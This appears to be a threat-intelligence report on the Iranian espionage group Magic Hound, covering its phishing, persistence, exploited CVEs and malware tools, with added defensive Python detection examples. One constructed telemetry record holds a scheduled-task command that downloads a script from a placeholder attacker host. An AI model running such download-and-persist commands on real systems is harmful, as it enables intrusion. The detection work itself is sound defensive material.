Cyble analyzes Magic Hound – the notorious Iranian cyber espionage group, focusing on its tactics, targets, and campaigns in detail.
Magic Hound is a cyber espionage group believed to be associated with Iran. It has been active since at least 2014 and is known for targeting individuals and organizations primarily in the Middle East, particularly those with ties to Iranian interests. The group has been linked to various campaigns aimed at stealing sensitive information, conducting surveillance, and carrying out espionage activities.
Magic Hound employs a range of tactics, techniques, and procedures (TTPs) in its operations, including spear phishing, social engineering, and the use of custom malware. It often creates sophisticated phishing emails and websites to trick its targets into revealing credentials or installing malware on their systems.
One notable aspect of Magic Hound’s operations is their focus on targeting high-profile individuals, such as journalists, academics, government officials, and activists, who have insights or influence in areas of interest to the Iranian government. By compromising these individuals, Magic Hound seeks to gather intelligence and potentially influence political or social developments in the region.
Cybersecurity researchers and organizations have closely monitored and analyzed the group’s activities, providing valuable insights into its tactics, motives, and potential impact on targeted individuals and organizations.

Figure 1 – Cyble Vision Threat Library (Source: Cyble Vision)
Country of Origin
Magic Hound is an Iranian cyber espionage group.
Targeted Nations
Magic Hound is known for its extensive cyber espionage endeavors, encompassing a diverse array of countries and regions. These include Afghanistan, Belgium, Brazil, Canada, Egypt, France, Iran, Iraq, Israel, Jordan, Kuwait, Morocco, Pakistan, Saudi Arabia, Spain, Syria, Turkey, UAE, UK, USA, Venezuela, Yemen, and Gaza.

Figure 2 – Origin and Targeted Countries (Source: Cyble Vision)
Aliases
Magic Hound has gone by a number of aliases over its decade-long history; some of these are:
APT35, Cobalt Illusion, Cobalt Mirage, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, Phosphorus, TunnelVision, UNC788, Yellow Garuda, Educated Manticore, Mint Sandstorm, Ballistic Bobcat, and Charming Cypress.
Targeted Sectors
Magic Hound has a diverse array of attack vectors and techniques that can be customized for its targets. So far, the group has been observed attacking the following sectors:
- Aerospace & Defense
- Education
- Energy & Utilities
- BFSI
- Government & LEA
- Healthcare
- IT & ITES
- Manufacturing
- Organizations
- Technology
- Telecommunication
Links to Other APT Groups
Researchers suspect an overlap of infrastructure between Magic Hound and Rocket Kitten, Newscaster, NewsBeef, ITG18, DEV-0270, and APT42.
Magic Hound Lifecycle
Several infection vectors are associated with Magic Hound, including malicious document files, the use of publicly available Proof of Concepts (PoCs), social engineering, and compromising websites.

Figure 3 – Magic Hound APT Lifecycle
Initial Infection
The threat actors behind Magic Hound strategically leverage multiple platforms, such as email, social media, and chat messengers, to broaden their attack vectors. Social engineering plays a pivotal role in Magic Hound’s tactics during cyber espionage operations. Malicious documents and applications are circulated through personalized engagements with targets, maximizing effectiveness.
Magic Hound’s social engineering attacks commonly employ recruitment offers, journalistic or political analysis requests, romantic entanglements, and anti-government activism feigns. For these to have a maximum chance of success, utilizing foreign languages and understanding diverse societies remain crucial.
To that end, Magic Hound is proficient in English and major European, Middle Eastern, and South Asian languages, indicating a persistent focus on expanding linguistic capabilities to enhance targeted social engineering endeavors.
Phishing
Magic Hound’s phishing campaigns are tailored to bait specific targets, employing various personas tied to media organizations and research institutions. Magic Hound conducted spear-phishing attacks posing as the Rasanah International Institute for Iranian Studies (IIIS), utilizing multiple typo-squatted domains resembling the organization’s actual domain, rasanah-iiis[.]org, to enhance deception and increase the efficacy of their attacks. The figure below shows the phishing email.

Figure 4 – Phishing Email Masquerading as IIIS (Source: Volexity)
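The typo-squatted domains described above are a detection opportunity at the mail gateway. The following is an added example, not Cyble's or Volexity's code: it scores inbound sender domains against a list of protected domains by edit distance on the second-level label, so a one-character drop, a TLD swap or a removed hyphen is surfaced for review. The protected domain rasanah-iiis.org comes from the page; the sender domains in the sample are constructed.

```python
"""Flag sender domains that resemble a protected domain (typosquat triage).

Added example, not Cyble's or Volexity's code. The protected domain
rasanah-iiis.org comes from the page; the sender domains below are
constructed and are not real lookalikes observed in the wild.
"""
from typing import Dict, List, Optional

PROTECTED_DOMAINS = ["rasanah-iiis.org"]

# Constructed sample of sender domains as they might appear in mail-gateway logs.
SAMPLE_SENDERS = [
    "rasanah-iiis.org",   # legitimate, exact match
    "rasanah-iis.org",    # one character dropped
    "rasanah-iiis.com",   # top-level domain swapped
    "rasanahiiis.org",    # hyphen dropped
    "example.com",        # unrelated
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance with unit cost for insert, delete and substitute."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # delete ca
                           cur[j - 1] + 1,               # insert cb
                           prev[j - 1] + (ca != cb)))    # substitute
        prev = cur
    return prev[-1]


def second_level_label(domain: str) -> str:
    """Label left of the TLD; naive on multi-part suffixes such as co.uk."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def lookalike_match(domain: str, max_distance: int = 2) -> Optional[str]:
    """Return the protected domain this sender mimics, or None.

    An exact match is legitimate. Otherwise the second-level labels are
    compared with hyphens removed (dropped hyphens are a common squat),
    and anything within max_distance edits is flagged.
    """
    domain = domain.lower()
    if domain in PROTECTED_DOMAINS:
        return None
    label = second_level_label(domain).replace("-", "")
    for protected in PROTECTED_DOMAINS:
        target = second_level_label(protected).replace("-", "")
        if levenshtein(label, target) <= max_distance:
            return protected
    return None


def triage(senders: List[str]) -> Dict[str, str]:
    """Map each suspicious sender domain to the protected domain it mimics."""
    hits = {}
    for sender in senders:
        match = lookalike_match(sender)
        if match:
            hits[sender] = match
    return hits


if __name__ == "__main__":
    for sender, mimicked in triage(SAMPLE_SENDERS).items():
        print(f"{sender} looks like {mimicked}")
```

The distance threshold of 2 is a starting point; short brand labels need a tighter threshold, and a production deployment would use a public-suffix list rather than the naive second-level split.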
Social Engineering
Magic Hound adopted personas of notable figures, such as a journalist from a reputable news outlet. They spoofed email addresses to mimic the journalist’s personal account or used compromised legitimate accounts. Initiating benign conversations, they sought input on articles regarding the Israel-Hamas conflict. These initial emails lacked malicious content, serving to establish trust before potential exploitation.
This strategy, involving the impersonation of familiar figures, tailored phishing lures, and innocuous initial messages, aims to cultivate trust with targets before delivering malicious content. The use of compromised yet legitimate email accounts likely enhanced Magic Hound’s credibility, potentially contributing to the campaign’s success.
The figure below shows a fake social media profile of a researcher at the French National Center for Scientific Research (CNRS), which specializes in imaging and therapeutic strategies for cancers and brain tissues. Magic Hound used this profile in a past campaign.

Figure 5 – Fake social media profile of a French researcher (Source: CERTFA)
Execution and Persistence
In certain instances, the threat actors used malicious .vbs files for persistence in target environments. Upon execution, these .vbs files added entries under the CurrentVersion\Run registry key. Alternatively, Magic Hound created scheduled tasks that connect to attacker-controlled domains and download files. For persistence, Magic Hound has also created local accounts, default accounts, and domain accounts, and deployed webshells.
Magic Hound extends its campaigns to macOS systems. Upon identifying macOS among its victims, the APT employs Mach-O binaries camouflaged as VPN applications. These binaries download and execute a Bash script-based backdoor known as NokNok.
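The two Windows persistence patterns above (a Run-key value that launches a script, and a scheduled task whose action pulls from a remote location) map directly onto endpoint telemetry. The following is an added example, not Cyble's code, of detection logic run over constructed Sysmon-style records; the user name, file names and the c2-placeholder.example domain are placeholders, not indicators from the page.

```python
"""Flag the Run-key and scheduled-task persistence patterns described above.

Added example, not Cyble's code. The records are constructed Sysmon-style
events (EventID 13 = registry value set, EventID 1 = process creation);
the user name, file names and the c2-placeholder.example domain are
placeholders, not indicators from the page.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed telemetry. Field names follow Sysmon's schema.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "Details": r"wscript.exe C:\Users\user\AppData\Roaming\update.vbs"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 10 /tn Sync '
                    r'/tr "curl.exe -s http://c2-placeholder.example/u -o C:\Users\Public\u.vbs"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /query /tn Sync"},
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(
    r"\b(wscript|cscript|mshta|powershell)(\.exe)?\b|\.(vbs|vbe|js|jse)\b", re.IGNORECASE)
TASK_CREATE_RE = re.compile(r"\s/create\b", re.IGNORECASE)
# A URL or a UNC path inside the task action.
REMOTE_SOURCE_RE = re.compile(r"https?://|\\\\[^\\\s]+\\", re.IGNORECASE)


def check_run_key(event: Dict) -> Optional[str]:
    """Run-key value whose data invokes a script host or a script file."""
    if event.get("EventID") != 13:
        return None
    if not RUN_KEY_RE.search(event.get("TargetObject", "")):
        return None
    if SCRIPT_HOST_RE.search(event.get("Details", "")):
        return "run-key persistence via script host"
    return None


def check_scheduled_task(event: Dict) -> Optional[str]:
    """schtasks /create whose action references a URL or UNC path."""
    if event.get("EventID") != 1:
        return None
    if not event.get("Image", "").lower().endswith("schtasks.exe"):
        return None
    cmd = event.get("CommandLine", "")
    if TASK_CREATE_RE.search(cmd) and REMOTE_SOURCE_RE.search(cmd):
        return "scheduled task that fetches from a remote location"
    return None


def detect(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (event index, reason) for every event a check flags."""
    hits = []
    for idx, event in enumerate(events):
        for check in (check_run_key, check_scheduled_task):
            reason = check(event)
            if reason:
                hits.append((idx, reason))
    return hits


if __name__ == "__main__":
    for idx, reason in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

The vendor installer writing a plain executable path to its own Run key (event 1) and the `schtasks /query` call (event 3) are deliberately included as benign noise; both pass without a hit, which is the behaviour a tuned rule needs before it is useful on a real fleet.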
Exploited Vulnerabilities
The Magic Hound group has exploited various vulnerabilities in their campaigns. Some important vulnerabilities targeted are:
CVE-2023-27350: PaperCut MF/NG Improper Access Control Vulnerability.
CVE-2022-47986: IBM Aspera Faspex Code Execution Vulnerability.
CVE-2022-47966: Zoho ManageEngine Multiple Products Remote Code Execution Vulnerability.
CVE-2021-44228: Apache Log4j2 Remote Code Execution Vulnerability.
CVE-2021-45046: Apache Log4j2 Deserialization of Untrusted Data Vulnerability.
CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207: Microsoft Exchange ProxyShell vulnerabilities.
Tools used by Magic Hound
Magic Hound employs a diverse range of tools, delivered as final payloads or used alongside them. These include BASICSTAR, ChromeHistoryView, CommandCam, CWoolger, DistTrack, DownPaper, FireMalv, FRP, Ghambar, GoProxy, Havij, HYPERSCRAPE, Leash, Matryoshka RAT, MediaPl, Mimikatz, MischiefTut, MPKBot, NETWoolger, NOKNOK, PINEFLOWER, PowerLess Backdoor, POWERSTAR, RATHOLE, PsList, PupyRAT, Sponsor, sqlmap, TDTESS, and WinRAR. Researchers can correlate ongoing campaigns by analyzing the IPs and domains associated with past attacks, facilitating the identification and tracking of the group’s activities.

Figure 6 – Magic Hound Tools (Source: Cyble Vision)
BASICSTAR: The RAR + LNK infection chain deploys an undocumented backdoor, identified by Volexity as BASICSTAR. BASICSTAR is capable of exfiltrating system information such as the device’s computer name, username, and operating system. This information is reversed and encoded in base64 before being transmitted to the C&C server.
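The reverse-then-base64 encoding described for BASICSTAR is trivial to undo, which matters when triaging captured beacons. The following is an added example, not Cyble's or Volexity's code, that decodes such a field back into its plaintext and splits it into computer name, username and OS. It assumes the encoding is exactly "reverse the text, then base64-encode it"; the '|' separator, the field order and the sample values are constructed for illustration and are not taken from the malware.

```python
"""Decode the reverse-then-base64 system-information field described for BASICSTAR.

Added example, not Cyble's or Volexity's code. Assumes the encoding is
exactly "reverse the text, then base64-encode it"; the '|' separator,
field order and sample values are constructed, not taken from the malware.
"""
import base64
import binascii
from typing import Dict, Optional


def encode_reversed_b64(text: str) -> str:
    """Reference encoder used only to build fixtures: reverse, then base64."""
    return base64.b64encode(text[::-1].encode("utf-8")).decode("ascii")


def decode_beacon_field(blob: str) -> Optional[str]:
    """Undo base64, then reverse. Returns None on invalid base64 or non-UTF-8 bytes."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-8")[::-1]
    except (binascii.Error, UnicodeDecodeError):
        return None


def parse_beacon(blob: str) -> Optional[Dict[str, str]]:
    """Split the decoded text into the three fields the report names."""
    decoded = decode_beacon_field(blob)
    if decoded is None:
        return None
    parts = decoded.split("|")
    if len(parts) != 3:
        return None
    return dict(zip(("computer_name", "username", "os"), parts))


# Constructed beacon body: hostname, username and OS joined with '|' then encoded.
SAMPLE_FIELD = encode_reversed_b64("WS-0042|jdoe|Windows 10 Pro")


if __name__ == "__main__":
    print(SAMPLE_FIELD)
    print(parse_beacon(SAMPLE_FIELD))
```

Because the transform has no key, the same decoder can be applied to proxy captures of the C&C request body; a field that fails to decode simply returns None rather than raising, so it can be run across a large sample without special-casing.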
ChromeHistoryView: ChromeHistoryView is a compact utility designed to extract information from the history data file of the Google Chrome web browser. It presents a comprehensive list of recently visited web pages, including details such as URL, title, visit date/time, number of visits, typed count (indicating how many times the address was manually typed), referrer, and visit ID.
CommandCam: CommandCam is a Windows-compatible open-source tool developed by Ted Burke, enabling users to conveniently capture still images from a webcam via the command line interface.
CWoolger: CWoolger is a keylogger malware used in Operation Woolen Goldfish.
DistTrack: DistTrack, also referred to as Shamoon, is a destructive worm that specifically targets a system’s master boot record (MBR). The name “Shamoon” originated from the original payload, which contained debugging information pointing to a programming database file with this distinct name in the path.
DownPaper: DownPaper, occasionally distributed under the filename sami.exe, is classified as a backdoor trojan. Its primary function involves downloading and executing a second-stage payload.
FireMalv: FireMalv is a credential-stealing tool built on the .NET framework, specifically targeting Firefox. This malicious software is designed to extract passwords stored within the Firefox browser’s storage.
FRP: FRP serves as a swift reverse proxy solution, facilitating the exposure of a local server hidden behind a NAT or firewall to the broader internet.
Ghambar: Ghambar, an information stealer crafted in C#, utilizes a SOAP-based command and control protocol. Despite having fewer features, Ghambar boasts a more refined design and cleaner code style. Notably, it’s engineered to minimize its footprint on the system. When capturing screenshots, clipboard data, and intercepted keystrokes, it endeavors to transmit the data directly to the command and control server without leaving traces on the disk.
GoProxy: GoProxy is a versatile tool that excels as an HTTP, HTTPS, SOCKS5, Shadowsocks, WebSocket, TCP, and UDP proxy, as well as a game shield and game proxy. It supports various proxy types, including forward, reverse, transparent, and NAT proxies. Additionally, it offers features such as HTTPS and HTTP proxy load balancing, SOCKS5 proxy load balancing, socket proxy load balancing, Shadowsocks proxy load balancing, TCP/UDP port mapping, SSH transit, TLS encrypted transmission, protocol conversion, anti-pollution DNS proxy, API authentication, speed limiting, and connection limiting.
Havij: Havij, an automatic SQL Injection tool developed by Iranian security company ITSecTeam, derives its name from “carrot”, its icon. With a user-friendly GUI, Havij simplifies data retrieval, potentially contributing to a shift from code-writing hackers to non-technical users in deploying attacks, owing to its accessibility.
HYPERSCRAPE: HYPERSCRAPE is a tool for extracting user data from Gmail, Yahoo!, and Microsoft Outlook accounts. The attacker employs HYPERSCRAPE on their local system to access victims’ inboxes, utilizing credentials obtained beforehand.
Leash: Leash functions as an IRC bot used for C&C communications. It receives its commands through private messages (PRIVMSG) sent by the adversary, who must also be connected to the IRC server.
Matryoshka RAT: The Matryoshka infection framework comprises three core components: the Dropper, Reflective Loader, and RAT component.
Tasks include obfuscating code and signaling execution to the C&C, launching the loader to execute functions, reporting anti-analysis logic to C&C, employing anti-debugging and anti-sandboxing techniques, resolving runtime API addresses, covert DLL injection of the RAT library, creating persistence files on disk, configuring Reflective Loader for survival across reboots and process exits, facilitating DNS Command and Control communication, and implementing common RAT functionalities.
MediaPl: MediaPl is a backdoor designed to transmit encrypted communications to its C&C server. It disguises itself as Windows Media Player, a widely used application for storing and playing audio and video files.
Mimikatz: Mimikatz offers a comprehensive suite of tools tailored for gathering and leveraging Windows credentials on targeted systems. These tools enable the retrieval of various credentials such as cleartext passwords, LAN Manager hashes, NTLM hashes, certificates, and Kerberos tickets. While these tools generally run successfully on Windows versions from XP onwards, their functionality may be somewhat restricted on Windows 8.1 and later versions.
MischiefTut: MischiefTut is a specialized backdoor constructed using PowerShell, equipped with fundamental functionalities. It can execute reconnaissance commands, store outputs in text files, and purportedly transmit data to infrastructure controlled by adversaries. Additionally, MischiefTut facilitates the downloading of supplementary tools onto compromised systems.
MPKBot: MPKBot is an IRC bot closely resembling the MPK Trojan, employing a proprietary C&C communications protocol and sharing an IP address with the Leash IRC bot in one previous campaign.
NETWoolger: A ‘.NET-based woolen keylogger’ that functions similarly to the CWoolger malware. Attackers use the two interchangeably as alternate infection mechanisms.
NOKNOK: NokNok is a type of backdoor malware specifically targeting macOS (Mac Operating Systems). These programs create a pathway known as a “backdoor,” allowing additional malicious components to infiltrate compromised systems.
PINEFLOWER: PINEFLOWER is an Android malware family renowned for its diverse array of backdoor functionalities. These include pilfering system information, logging phone calls, recording audio, accessing SMS messages, and sending SMS messages. Additionally, the malware facilitates device tracking, file manipulation, connectivity monitoring, and toggling various settings such as Bluetooth, Wi-Fi, and mobile data.
PowerLess Backdoor: PowerLess is a PowerShell backdoor associated with the Phosphorus group. It enables the download of supplementary payloads, including a keylogger and an information stealer.
POWERSTAR: POWERSTAR is a backdoor likely complemented by a custom server-side component, streamlining basic operations for the malware operator. Notably, this latest iteration of the malware boasts an array of intriguing features, such as leveraging the InterPlanetary File System (IPFS) and remotely hosting its decryption function and configuration details on publicly accessible cloud hosting.
RATHOLE: RATHOLE is a reliable, efficient, and high-performing reverse proxy designed for NAT traversal, developed in Rust. Similar to frp and ngrok, RATHOLE facilitates the exposure of services on devices behind NAT to the Internet through a server with a public IP.
PsList: PsList is a tool designed to display a comprehensive list of processes currently active within the operating system. It is an integral component of the SysInternals Tools suite.
PupyRAT: Pupy is an open-source, cross-platform Remote Access Trojan (RAT) and post-exploitation framework primarily developed in Python. It supports loading from a variety of sources, including PE EXE, reflective DLL, Linux ELF, pure Python, PowerShell, and APK.
Sponsor: Sponsor is a backdoor malware that relies on configuration files stored on disk. Batch files surreptitiously install these files and are deliberately crafted to appear harmless, aiming to bypass detection by scanning engines.
sqlmap: sqlmap is an open-source penetration testing tool capable of automating the detection and exploitation of SQL injection vulnerabilities.
TDTESS: TDTESS, a 64-bit .NET binary backdoor, provides a reverse shell and file download and execution capabilities. It maintains regular communication with the C&C server via basic authentication, receiving commands through a web page. The malware conceals a stealth service, evading detection by service managers and enumeration tools.
Network Activities
Magic Hound employs diverse methods to communicate with its C&C servers, including web protocols, encrypted channels, ingress tool transfer, and nonstandard ports. An intriguing tactic observed in one campaign involved the InterPlanetary File System (IPFS). Instead of connecting directly to the threat actor’s C&C, some malware variants first look for instructions on IPFS, a decentralized network akin to a shared storage space whose files are accessed via unique codes. If instructions are found, they are executed; otherwise, the malware falls back to a hardcoded C&C server. IPFS is attractive to the actor because its decentralized nature makes it difficult for third parties to remove stored files, which in turn complicates takedown and detection.
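From the network side, the "check IPFS first, fall back to a hardcoded C&C" behaviour leaves a recognisable sequence: a fetch of an /ipfs/ object through a public gateway, followed shortly by a connection from the same host to an unrelated server on a non-standard port. The following is an added example, not Cyble's code, of a heuristic over constructed proxy log lines that surfaces that sequence. ipfs.io and dweb.link are real public IPFS gateways; every other host, IP address, port and CID-like path in the sample is a placeholder.

```python
"""Heuristic for the IPFS-first, hardcoded-C&C-fallback pattern in proxy logs.

Added example, not Cyble's code. The log is constructed in a simple
"HH:MM:SS src_ip dst_host dst_port path" form; ipfs.io and dweb.link are
real public IPFS gateways, every other host, IP and CID-like path is a
placeholder.
"""
import re
from collections import defaultdict
from typing import Dict, List

IPFS_GATEWAYS = {"ipfs.io", "dweb.link"}
STANDARD_WEB_PORTS = {80, 443}
IPFS_PATH_RE = re.compile(r"^/ipfs/[A-Za-z0-9]{20,}")

# Constructed proxy log: time src_ip dst_host dst_port path
SAMPLE_LOG = """\
10:00:01 10.1.1.5 ipfs.io 443 /ipfs/bafyplaceholdercid0000000000000001
10:00:07 10.1.1.5 c2-placeholder.example 8080 /gate
10:05:00 10.1.1.9 dweb.link 443 /ipfs/bafyplaceholdercid0000000000000002
10:06:00 10.1.1.7 cdn.example 443 /assets/app.js
"""


def parse_line(line: str) -> Dict:
    """Split one log line and convert the timestamp to seconds since midnight."""
    ts, src, host, port, path = line.split()
    h, m, s = (int(x) for x in ts.split(":"))
    return {"t": h * 3600 + m * 60 + s, "src": src,
            "host": host, "port": int(port), "path": path}


def find_ipfs_fallback(log_text: str, window: int = 300) -> List[Dict]:
    """Flag every source that fetches an IPFS object (severity low) and
    escalate to high when a connection to a non-gateway host on a
    non-standard port follows within `window` seconds, which is what the
    "no instructions on IPFS, fall back to hardcoded C&C" path looks like."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            event = parse_line(line)
            by_src[event["src"]].append(event)

    findings = []
    for src, events in by_src.items():
        events.sort(key=lambda e: e["t"])
        for fetch in events:
            if fetch["host"] not in IPFS_GATEWAYS or not IPFS_PATH_RE.match(fetch["path"]):
                continue
            followups = [e for e in events
                         if fetch["t"] < e["t"] <= fetch["t"] + window
                         and e["host"] not in IPFS_GATEWAYS
                         and e["port"] not in STANDARD_WEB_PORTS]
            finding = {"src": src, "ipfs_host": fetch["host"], "severity": "low"}
            if followups:
                finding.update(severity="high",
                               fallback_host=followups[0]["host"],
                               fallback_port=followups[0]["port"])
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_ipfs_fallback(SAMPLE_LOG):
        print(f)
```

IPFS gateway traffic is legitimate in many environments, so the low-severity hit on its own is only an enrichment signal; the correlation with a subsequent non-standard-port connection is what makes the high-severity finding worth an analyst's time. Gateway lists and the time window are tuning knobs, not fixed values.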
Conclusion
The Magic Hound APT group represents a sophisticated and persistent threat actor engaging in diverse cyber espionage and information operations. Known for leveraging social engineering tactics, including phishing and impersonation, across multiple platforms, their campaigns have targeted individuals and organizations globally. With an evolving toolkit and proficiency in multiple languages, Magic Hound continues to pose significant challenges to cybersecurity efforts, necessitating ongoing vigilance and robust defense strategies.
Recommendations
To mitigate the threat posed by Magic Hound, consider the following recommendations:
User Awareness Training: Educate employees about the risks of phishing attacks and social media attacks and the importance of verifying the legitimacy of people, emails, and attachments before further interaction.
Email Filtering: Implement robust email filtering solutions to detect and block suspicious emails containing malicious attachments or links.
Patch Management: Ensure all systems and software are regularly patched and updated to address known vulnerabilities that Magic Hound could exploit.
Endpoint Protection: Deploy advanced endpoint protection solutions capable of detecting and blocking malicious activity, including the execution of unauthorized scripts and commands.
Network Segmentation: Segment your network to limit the spread of malware in the event of a successful intrusion, isolating critical systems and sensitive data from potential threats.
Incident Response Plan: Develop and regularly test an incident response plan to ensure your organization can quickly and effectively respond to and mitigate any security incidents involving Magic Hound.
Threat Intelligence Sharing: Participate in threat intelligence sharing communities to stay informed about emerging threats and tactics used by Magic Hound and other threat actors.
MITRE ATT&CK Techniques Associated with Magic Hound

Figure 7 – MITRE ATT&CK (Source: Cyble Vision)
Vulnerability Scanning (T1595.002): Magic Hound scans for known vulnerabilities to exploit.
Spearphishing Attachment (T1566.001): Magic Hound frequently uses spearphishing emails with malicious attachments to initiate their attacks.
Spearphishing Link (T1566.002): The group also employs spearphishing emails containing malicious links to deliver their payloads.
User Execution (T1204): Magic Hound uses social engineering techniques to convince users to execute its malicious payloads.
Scheduled Task (T1053.005): The group leverages scheduled tasks to establish persistence on compromised systems.
Command and Scripting Interpreter (T1059.003): Magic Hound utilizes command and scripting interpreters to execute malicious scripts and commands on targeted systems.
Exfiltration Over Alternative Protocol (T1048): The group may exfiltrate stolen data using alternative protocols to evade detection.
Data from Local System (T1005): Magic Hound gathers sensitive information from local systems during their operations.